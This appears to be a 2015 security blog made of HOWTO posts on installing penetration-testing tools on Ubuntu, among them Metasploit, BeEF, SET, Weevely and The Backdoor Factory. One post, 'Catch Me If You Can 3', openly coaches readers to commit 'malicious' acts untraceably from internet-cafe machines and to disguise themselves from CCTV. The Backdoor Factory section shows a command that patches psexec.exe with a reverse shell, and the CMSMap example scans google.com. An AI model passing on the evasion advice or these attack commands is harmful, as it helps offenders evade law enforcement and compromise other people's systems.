Saturday, August 29, 2015

HOWTO : Commix on Ubuntu 14.04 LTS

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in Python programming language.


Install

sudo apt-get install git

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/stasinopoulos/commix.git
cd commix
python commix.py -h



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/commix
python commix.py --update



Reference

Wiki


That's all! See you.


HOWTO : HconSTF on Ubuntu 14.04

Hcon Security Testing Framework (HconSTF) is Web Application Security Analysis & Penetration Testing Framework made of mozilla technologies.

Most of the part of HconSTF is semi-automated but you still need your brain to work it out. It can be use in all kind of security testing stages, it has tools for conducting tasks like,

- Web Penetration Testing
- Web Exploits Development
- Web Malware Analysis
- Open Source Intelligence ( Cyber Spying & Doxing )


Install

cd ~
mkdir arsenal
cd arsenal


For x86_64 system :

wget http://sourceforge.net/projects/hconframework/files/HconFramework-Fire/HconSTF_0.5_Prime/HconSTF_v0.5_Prime_Linux_x64.tar.bz2
tar -jxvf HconSTF_v0.5_Prime_Linux_x64.tar.bz2
cd HconSTF
sudo ./HconSTF


For x86 system :

wget http://sourceforge.net/projects/hconframework/files/HconFramework-Fire/HconSTF_0.5_Prime/HconSTF_v0.5_Linux_x86.tar.bz2
tar -jxvf HconSTF_v0.5_Linux_x86.tar.bz2
cd HconSTF
sudo ./HconSTF



Update/Upgrade

rm -R ~/arsenal/HconSTF

Go to the official site to download the latest version and repeat the Install procedure.


Reference

User Manual (PDF)


That's all! See you.


HOWTO : PTF on Ubuntu 14.04 LTS

The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we've been accustom to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important.

PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It's all up to you.

The ultimate goal is for community support on this project. We want new tools added to the github repository. Submit your modules. It's super simple to configure and add them and only takes a few minute.


Install

*** Please be informed that this PTF will install x86 tools only. If your system is x86_64, you need to change the download link in the modules directory when necessary. ***

sudo apt-get install git

cd ~
git clone https://github.com/trustedsec/ptf.git
cd ptf
sudo ./ptf


If you want to install and/or update everything :

use modules/install_update_all
run



All the modules (pentesting tools) are installed at /pentest directory. Please note that WINE and i386 dependencies will be installed accordingly.


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

PTF will try to update itself on every start up. Meanwhile, you can run PTF at any directory after the first run.

If you want to update everything :

sudo ptf
use modules/install_update_all
run



Reference

Video

Documentation


That's all! See you.


Friday, August 28, 2015

Catch Me If You Can 3

Last year, I was talking about how to use NightHawk to do malicious things. The full article is here. Two years ago, I also talked about using pre-paid SIM card to do malicious things and the full article is here. However, you think that it would be a chance to be caught as TOR network exit nodes may be monitoring by law enforcements. Meanwhile, identity registration may be needed to purchase SIM card in your country. Okay, today I will introudce another method that you can use wired network to do malicious things untraceable.

In my country, there are many "Internet Cafe" which have a pool of computer systems that running Windows system to provide network gaming or internet services to their customers with a cheap price per hour. Those computer systems will be equipped "Reborn Card" which can reset to its default setting on every reboot. Normally, the "Internet Cafe" will reboot their computer systems every day.

You can hire a computer system in the "Internet Cafe", reboot it. Plug in your Kali Linux or BackBox Linux Live USB (or your custom made pentesting Linux Live USB). Personally, I will recommend BackBox as it will have some outstanding features, such as memory wiper.

After your malicious tasks, you can reboot your computer system and it will reset to its default setting. Normally, no data or activiities will be logged in the computer system.

When law enforcements trace your IP address which will direct them to the "Internet Cafe", they cannot obtain any evidence from the computer pool as those systems are reborned!

Finally, beware that CCTV will be installed in the "Internet Cafe" or nearby shops which will capture your present. You may need to do some "make up" when necessary.

That's all! See you.


HOWTO : OpenVAS on Ubuntu 14.04 LTS

OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.


Install

To install OpenVAS 8 on Ubuntu 14.04 LTS :

sudo add-apt-repository ppa:mrazavi/openvas

sudo apt-get update
sudo apt-get install xsltproc sqlite3 openvas

sudo openvas-nvt-sync
sudo openvas-scapdata-sync
sudo openvas-certdata-sync

sudo service openvas-scanner restart
sudo service openvas-manager restart
sudo openvasmd --rebuild --progress


To run it :

Open browser to point to https://localhost:443

* username and password are both "admin"


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

sudo openvas-nvt-sync
sudo openvas-scapdata-sync
sudo openvas-certdata-sync

sudo service openvas-scanner restart
sudo service openvas-manager restart
sudo openvasmd --rebuild --progress



Reference

You can disable OpenVAS auto startup on every boot and start it manually. Please note that if OpenVAS is running, shutdown process will take time.

For example :

sudo update-rc.d openvas-scanner disable
sudo update-rc.d openvas-manager disable


To start up manually :

sudo service openvas-scanner start
sudo service openvas-manager start


To stop manually :

sudo service openvas-scanner stop
sudo service openvas-manager stop



That's all! See you.


HOWTO : the-backdoor-factory on Ubuntu 14.04 LTS

The Backdoor Factory (BDF) is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.


Install

sudo apt-get install git python-pip build-essential

Install BDFactory :

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
cd the-backdoor-factory
sudo pip install capstone
sudo ./install.sh


How to run it :

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp

Install BDFProxy :

cd ~/arsenal
git clone https://github.com/secretsquirrel/BDFProxy.git
cd BDFProxy
sudo ./install.sh


How to run it :

nano bdfproxy.cfg

*change the settings when necessary

./bdf_proxy.py

msfconsole -r bdfproxy_msf_resource.rc



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/the-backdoor-factory
sudo ./update.sh

cd ~/arsenal/BDFProxy
sudo ./update.sh



Reference

See also : Metaspolit Framework


That's all! See you.


HOWTO : SPIKE on Ubuntu 14.04 LTS

SPIKE is a fuzzer to find exploitable bugs on application programs.


Install

sudo apt-get install build-essential

cd ~
mkdir arsenal
cd arsenal
wget http://www.immunitysec.com/downloads/SPIKE2.9.tgz
tar -xzvf SPIKE2.9.tgz
cd SPIKE/src
./configure
make



* For how to use it, please refer to the links at "Reference" below.


Update/Upgrade

Nil


Reference

An Introduction to Fuzzing: Using fuzzers (SPIKE) to find vulnerabilities

Fuzzer Automation with SPIKE


* Or, read the documents at ~/arsenal/SPIKE/SPIKE/documentations


That's all! See you.


HOWTO : MACchanger on Ubuntu 14.04 LTS

A GNU/Linux utility for viewing/manipulating the MAC address of network interfaces.


Install

sudo apt-get install macchanger

macchanger -h



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade



Reference

Nil


That's all! See you.


HOWTO : edb-debugger on Ubuntu 14.04 LTS

edb is a cross platform x86/x86-64 debugger. It was inspired by Ollydbg, but aims to function on x86 and x86-64 as well as multiple OS's. Linux is the only officially supported platform at the moment, but FreeBSD, OpenBSD, OSX and Windows ports are underway with varying degrees of functionality.


Install

sudo apt-get install git build-essential libboost1.55-all-dev qt5-default libqt5xmlpatterns5-dev

cd ~
mkdir arsenal
cd arsenal
git clone --recursive https://github.com/eteran/edb-debugger.git
qmake
make
sudo make install
edb



Update/Upgrade

cd ~/arsenal
rm -R edb-debugger


Repeat the Install procedure as previous mentioned.


Reference

Wiki


That's all! See you.


Thursday, August 27, 2015

HOWTO : Arachni on Ubuntu 14.04 LTS

Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

It is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.

Unlike other scanners, it takes into account the dynamic nature of web applications, can detect changes caused while travelling through the paths of a web application’s cyclomatic complexity and is able to adjust itself accordingly. This way, attack/input vectors that would otherwise be undetectable by non-humans can be handled seamlessly.

Moreover, due to its integrated browser environment, it can also audit and inspect client-side code, as well as support highly complicated web applications which make heavy use of technologies such as JavaScript, HTML5, DOM manipulation and AJAX.

Finally, it is versatile enough to cover a great deal of use cases, ranging from a simple command line scanner utility, to a global high performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform.


Install

cd ~
cd arsenal
wget https://github.com/Arachni/arachni/releases/download/v1.2.1/arachni-1.2.1-0.5.7.1-linux-x86_64.tar.gz
tar -xvzf arachni-1.2.1-0.5.7.1-linux-x86_64.tar.gz
cd arachni-1.2.1-0.5.7.1/bin
./arachni_web


Start Firefox and point to http://127.0.0.1:9292

* Default credentials are as the following :

Administrator account

E-mail: admin@admin.admin
Password: administrator

Regular user account

E-mail: user@user.user
Password: regular_user


Update/Upgrade

rm -R ~/arsenal/arachni-1.2.1-0.5.7.1

Then repeat the Install procedure but to download the latest version.


Reference

Wiki


That's all! See you.


Sunday, August 23, 2015

HOWTO : NoSQLMap on Ubuntu 14.04 LTS

NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases as well as web applications using NoSQL in order to disclose data from the database.

It is named as a tribute to Bernardo Damele and Miroslav's Stampar's popular SQL injection tool sqlmap, and its concepts are based on and extensions of Ming Chow's excellent presentation at Defcon 21, "Abusing NoSQL Databases". Presently the tool's exploits are focused around MongoDB, but additional support for other NoSQL based platforms such as CouchDB, Redis, and Cassandra are planned in future releases.


Install

sudo apt-get install git python-setuptools

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/tcstool/nosqlmap.git
cd nosqlmap
sudo python setup.py install
python nosqlmap.py



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/nosqlmap
git pull origin master
python setup.py install --force



Reference

GitHub
Videos

See also : Metasploit Framework


That's all! See you.


HOWTO : BeEF on Ubuntu 14.04 LTS

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.


Install

sudo apt-get install git curl git libsqlite3-dev sqlite3 imagemagick ghostscript

Install Ruby :

gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
curl -sSL https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
rvm install 2.1.5
ruby -v


Install BeEF :

cd ~
mkdir arsenal
cd arsenal
git clone git://github.com/beefproject/beef.git

cd beef
rvm use ruby-2.1.5@beef --create
gem install bundler
bundle install
./beef


Open browser at go to http://127.0.0.1:3000/ui/panel
* username is "beef" while password is "beef".

* BeEF is default using Ruby 2.1.5.


Update/Upgrade

cd ~/arsenal/beef
git pull origin master
bundle install
./update-beef



Reference

Videos

See also : Metasploit Framework


That's all! See you.


HOWTO : SET on Ubuntu 14.04 LTS

The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.


Install

sudo apt-get install git python-impacket

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/trustedsec/social-engineer-toolkit.git
cd social-engineer-toolkit


sudo python setup.py install

Edit the Metasploit path :

nano /etc/setoolkit/set.config
METASPLOIT_PATH=/home/samiux/arsenal/metasploit-framework


* Please replace your path

To run it :

sudo setoolkit


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

sudo seupdate



Reference

See also : Metasploit Framework


That's all! See you.


HOWTO : Metasploit Framework on Ubuntu 14.04 LTS

Metasploit is an exploitation framework.


Install

sudo apt-get install git build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev default-jre git autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev xtightvncviewer libyaml-dev curl zlib1g-dev libffi-dev libgmp-dev

cd ~
mkdir arsenal
cd arsenal

Install Ruby :

gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
curl -sSL https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
rvm install 2.1.6
rvm use 2.1.6 --default
ruby -v


* Metasploit Framework use ruby 2.1.6 by default

Install NMap :

* Install NMap if you do not have it installed; otherwise, skip it.

cd ~/arsenal
git clone https://github.com/nmap/nmap.git
cd nmap
./configure
make
sudo make install


Configure PostgreSQL :

sudo -s
su postgres

createuser msf -P -S -R -D

* enter "msf" as password
createdb -O msf msf
exit
exit


Install Metasploit Framework :

cd ~/arsenal
git clone https://github.com/rapid7/metasploit-framework.git
cd metaploit-framework
rvm --default use ruby-2.1.6@metasploit-framework --create
gem install bundler
bundle install


Configure Metasploit :

cp ~/arsenal/metasploit-framework/config/database.yml.example ~/arsenal/metasploit-framework/config/database.yml
nano ~/arsenal/metasploit-framework/config/database.yml

development: &pgsql
  adapter: postgresql
  database: msf
  username: msf
  password: msf
  host: localhost
  port: 5432
  pool: 75
  timeout: 5

sudo sh -c "echo export MSF_DATABASE_CONFIG=/home/samiux/arsenal/metasploit-framework/config/database.yml >> /etc/profile"

source /etc/profile


* please rename the /home/samiux to your name.

To run it :

cd ~/arsenal
cd metasploit-framework
sudo service postgresql start
msfconsole
sudo service postgresql stop



Update/Ugrade

sudo apt-get update
sudo apt-get dist-upgrade
cd ~/arsenal/metasploit-framework
git pull origin master
msfupdate



Reference

See also : NMap


That's all! See you.


Saturday, August 22, 2015

HOWTO : John on Ubuntu 14.04 LTS

John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.


Install

sudo apt-get install build-essential libssl-dev

cd ~
mkdir arsenal
cd arsenal

wget http://www.openwall.com/john/j/john-1.8.0-jumbo-1.tar.gz
tar -xvzf john-1.8.0-jumbo-1.tar.gz
cd john-1.8.0-jumbo-1/src

./configure
make clean
make

cd ../run
./john --help



* you can also install by sudo apt-get install john john-data


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade


Go to Official site to download the source and compile it as mentioned above.


Reference

Please install Nvidia or AMD Graphic related drivers before installing John when necessary.


That's all! See you.


HOWTO : NetCat on Ubuntu 14.04 LTS

Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol.

It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Netcat, or "nc" as the actual program is named, should have been supplied long ago as another one of those cryptic but standard Unix tools.


Install

sudo apt-get install netcat-traditional
sudo update-alternatives --config nc


select /bin/nc.traditional by entering "2"

nc -h


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade



Reference

Nil


That's all! See you.


HOWTO : CMSMap on Ubuntu 14.04 LTS

CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs. The main purpose of CMSmap is to integrate common vulnerabilities for different types of CMSs in a single tool.

At the moment, CMSs supported by CMSmap are WordPress, Joomla and Drupal.


Install

sudo apt-get install git

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/Dionach/CMSmap.git
cd CMSmap
python cmsmap.py -t http://www.google.com



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/CMSmap
git pull origin master



Reference

Nil


That's all! See you.


Thursday, August 20, 2015

HOWTO : ZAP on Ubuntu 14.04 LTS

The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.

ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.


Install

sudo apt-get install default-jre unzip

cd ~
mkdir arsenal
cd arsenal

wget https://github.com/zaproxy/zaproxy/releases/download/w2015-08-12/ZAP_WEEKLY_D-2015-08-12.zip
unzip ZAP_WEEKLY_D-2015-08-12.zip
rm ZAP_WEEKLY_D-2015-08-12.zip
cd ZAP_D-2015-08-12
./zap.sh



* ZAP_WEEKLY_D-2015-08-12.zip as example.
* ZAP Team generate weekly releases of ZAP from the trunk, typically every Monday.
These are just intended for people who want to use all of the features we've added since the last 'full' release but dont want the hassle of building ZAP from the source code.
While we endeavor to ensure that weekly releases are robust, things may be broken or only partially implemented.


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade


cd ~/arsenal/

Go to Download to download ZAP Weekly and repeat the procedure of "Install" previously mentioned.


Reference

Wiki

Video


That's all! See you.

HOWTO : Burp Suite on Ubuntu 14.04 LTS

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.


Install

sudo apt-get install curl default-jre

cd ~
mkdir arsenal
cd arsenal
mkdir burpsuite
cd burpsuite
curl https://portswigger.net/DownloadUpdate.ashx?Product=Free -o burpsuite_free.jar
java -jar -Xmx1024m burpsuite_free.jar



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/burpsuite
rm burpsuite_free.jar
curl https://portswigger.net/DownloadUpdate.ashx?Product=Free -o burpsuite_free.jar



Reference

Getting Started

Documentation

See also : Professional Edition


That's all! See you.

Wednesday, August 19, 2015

HOWTO : Weevely on Ubuntu 14.04 LTS

Weevely is a command line web shell dynamically extended over the network at runtime designed for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments.

The low footprint agent and over 30 modules shape an extensible framework to administrate, conduct a pen-test, post-exploit, and audit remote web accesses in order to escalate privileges and pivot deeper in the internal networks.


Install

sudo apt-get install git build-essential python-pip libyaml-dev python-dev
sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/epinna/weevely3.git
cd weevely3
./weevely.py



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade
sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade

cd ~/arsenal/weevely3
git pull origin master



Reference

Wiki


That's all! See you.